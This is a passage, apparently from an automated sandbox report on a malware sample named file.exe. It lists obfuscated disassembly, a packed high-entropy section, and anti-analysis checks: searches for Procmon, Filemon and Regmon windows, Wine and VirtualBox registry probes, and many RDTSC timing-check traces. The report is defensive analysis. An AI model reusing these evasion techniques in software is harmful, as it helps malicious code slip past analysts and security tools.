                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0049D0E6 push ebp; mov dword ptr [esp], ecx | 0_2_0049D20E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0049D0E6 push edi; mov dword ptr [esp], 1462C404h | 0_2_0049D212
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0049D0E6 push edx; mov dword ptr [esp], edi | 0_2_0049D24B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push ecx; mov dword ptr [esp], eax | 0_2_0052B0F5
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push edi; mov dword ptr [esp], 789BC950h | 0_2_0052B25A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push edi; mov dword ptr [esp], ecx | 0_2_0052B277
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push esi; mov dword ptr [esp], edi | 0_2_0052B289
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push ecx; mov dword ptr [esp], edx | 0_2_0052B2A0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push ecx; mov dword ptr [esp], eax | 0_2_0052B303
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push 12306FA0h; mov dword ptr [esp], ebp | 0_2_0052B35E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push 21C0B600h; mov dword ptr [esp], ecx | 0_2_0052B39B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push 5EB521A5h; mov dword ptr [esp], esp | 0_2_0052B450
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push edi; mov dword ptr [esp], ecx | 0_2_0052B459
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push eax; mov dword ptr [esp], esi | 0_2_0052B49E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push 221BDC13h; mov dword ptr [esp], ebx | 0_2_0052B57C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push 42ADA826h; mov dword ptr [esp], edx | 0_2_0052B5A0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push edi; mov dword ptr [esp], ecx | 0_2_0052B6B6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052B083 push ebp; mov dword ptr [esp], 7B149FD6h | 0_2_0052B6DD
                Source: file.exe | Static PE information: section name: cbbjugzk entropy: 7.953118561919161

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-36586
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A241 second address: 53A275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2E6h 0x00000008 jno 00007F55E4D1D2D6h 0x0000000e jmp 00007F55E4D1D2E3h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A6B9 second address: 53A6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F55E4D05126h 0x0000000a pop ecx 0x0000000b jmp 00007F55E4D0512Bh 0x00000010 push edi 0x00000011 jnc 00007F55E4D05126h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A6D8 second address: 53A6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A6E5 second address: 53A6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A6E9 second address: 53A726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F55E4D1D2E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F55E4D1D2D6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F55E4D1D2DFh 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A726 second address: 53A72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53BFF3 second address: 53BFFD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C06D second address: 53C09D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007F55E4D0512Ch 0x00000011 push 00000000h 0x00000013 mov cx, D105h 0x00000017 push C1665E61h 0x0000001c jno 00007F55E4D05134h 0x00000022 push eax 0x00000023 push edx 0x00000024 jp 00007F55E4D05126h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C09D second address: 53C0DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 3E99A21Fh 0x0000000d mov dword ptr [ebp+122D1B08h], esi 0x00000013 push 00000003h 0x00000015 xor cx, 484Dh 0x0000001a push 00000000h 0x0000001c stc 0x0000001d push 00000003h 0x0000001f mov ch, D7h 0x00000021 push 923131CEh 0x00000026 push eax 0x00000027 push edx 0x00000028 jp 00007F55E4D1D2E6h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C0DB second address: 53C0E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C0E0 second address: 53C0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0E6 second address: 53C122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 523131CEh 0x0000000e mov edi, dword ptr [ebp+122D2AC9h] 0x00000014 lea ebx, dword ptr [ebp+12451F42h] 0x0000001a mov esi, dword ptr [ebp+122D2E0Dh] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F55E4D05134h 0x00000026 push eax 0x00000027 push edi 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C18F second address: 53C195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C195 second address: 53C1C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e sub si, 0622h 0x00000013 call 00007F55E4D05129h 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F55E4D05128h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1C4 second address: 53C1DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1DF second address: 53C1F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1F0 second address: 53C1F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C1F6 second address: 53C214 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F55E4D0512Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C214 second address: 53C2C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F55E4D1D2E7h 0x00000013 jng 00007F55E4D1D2D8h 0x00000019 popad 0x0000001a pop eax 0x0000001b mov ch, bh 0x0000001d push 00000003h 0x0000001f jmp 00007F55E4D1D2DAh 0x00000024 push 00000000h 0x00000026 mov ecx, ebx 0x00000028 push 00000003h 0x0000002a xor edx, 6FB2EF9Ah 0x00000030 push 89D67671h 0x00000035 pushad 0x00000036 jmp 00007F55E4D1D2E6h 0x0000003b jmp 00007F55E4D1D2E5h 0x00000040 popad 0x00000041 xor dword ptr [esp], 49D67671h 0x00000048 mov esi, 698C7F92h 0x0000004d lea ebx, dword ptr [ebp+12451F4Bh] 0x00000053 mov di, cx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F55E4D1D2E0h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C36D second address: 53C39E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05135h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F55E4D0512Ch 0x0000000f jbe 00007F55E4D05126h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F55E4D05128h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C39E second address: 53C3D6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F55E4D1D2D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F55E4D1D2DAh 0x00000012 movzx esi, si 0x00000015 pop ecx 0x00000016 push 00000000h 0x00000018 mov dl, al 0x0000001a push FDAD8F41h 0x0000001f pushad 0x00000020 jmp 00007F55E4D1D2E0h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C3D6 second address: 53C3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C3DC second address: 53C417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 0252713Fh 0x0000000d pushad 0x0000000e popad 0x0000000f mov dword ptr [ebp+122D1B14h], eax 0x00000015 push 00000003h 0x00000017 adc esi, 0A839250h 0x0000001d push 00000000h 0x0000001f mov edi, dword ptr [ebp+122D2D31h] 0x00000025 push 00000003h 0x00000027 mov ecx, dword ptr [ebp+122D2DD5h] 0x0000002d push 71F466A2h 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jng 00007F55E4D1D2D6h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524108 second address: 524110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524110 second address: 524119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B8CA second address: 55B8DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D0512Bh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B8DD second address: 55B901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F55E4D1D2DCh 0x0000000f ja 00007F55E4D1D2D6h 0x00000015 popad 0x00000016 push ebx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BA9E second address: 55BAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007F55E4D05126h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BBFE second address: 55BC08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BC08 second address: 55BC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BEBA second address: 55BEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BEC3 second address: 55BEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BEC9 second address: 55BEEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jo 00007F55E4D1D2D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C02F second address: 55C070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F55E4D05141h 0x0000000c jp 00007F55E4D05135h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F55E4D0512Dh 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C070 second address: 55C078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C078 second address: 55C08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F55E4D05126h 0x0000000f jne 00007F55E4D05126h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C203 second address: 55C207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C207 second address: 55C21D instructions: 0x00000000 rdtsc 0x00000002 js 00007F55E4D05126h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F55E4D0512Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C21D second address: 55C23E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D1D2DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F55E4D1D2F8h 0x00000010 pushad 0x00000011 jg 00007F55E4D1D2D6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C23E second address: 55C24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F55E4D05126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C9FF second address: 55CA0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CA0B second address: 55CA56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F55E4D05133h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d js 00007F55E4D0513Eh 0x00000013 push edx 0x00000014 je 00007F55E4D05126h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jl 00007F55E4D05126h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CA56 second address: 55CA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507A3 second address: 5507D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05126h 0x00000008 jno 00007F55E4D05126h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F55E4D05139h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507D0 second address: 5507D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507D4 second address: 5507DE instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5507DE second address: 5507FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F55E4D1D2E0h 0x0000000c js 00007F55E4D1D2D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CD07 second address: 55CD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D209 second address: 55D215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F55E4D1D2D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D32E second address: 55D332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D4A5 second address: 55D4A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240FF second address: 524108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51D451 second address: 51D470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F55E4D1D2E7h 0x0000000e jmp 00007F55E4D1D2E1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56771F second address: 567743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F55E4D05126h 0x0000000a pushad 0x0000000b ja 00007F55E4D05126h 0x00000011 jmp 00007F55E4D05130h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567743 second address: 567774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F55E4D1D2D6h 0x00000009 jmp 00007F55E4D1D2E7h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F55E4D1D2DDh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567A8E second address: 567A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569740 second address: 569749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569899 second address: 5698EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F55E4D0512Dh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F55E4D05138h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F55E4D05132h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F55E4D05126h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569EBF second address: 569EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A47B second address: 56A485 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A485 second address: 56A48A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A4FD second address: 56A55E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F55E4D0512Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F55E4D05139h 0x00000010 xchg eax, ebx 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F55E4D05128h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov si, EA2Fh 0x0000002f push eax 0x00000030 pushad 0x00000031 push edi 0x00000032 jp 00007F55E4D05126h 0x00000038 pop edi 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A6AC second address: 56A6C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F55E4D1D2E4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A6C1 second address: 56A6C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A849 second address: 56A84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A946 second address: 56A950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AA93 second address: 56AADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007F55E4D1D2D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F55E4D1D2D8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F55E4D1D2DFh 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AADE second address: 56AAE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AF7D second address: 56AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AF81 second address: 56AF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F55E4D0512Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C95F second address: 56C96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F55E4D1D2D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C96C second address: 56C970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C129 second address: 56C133 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
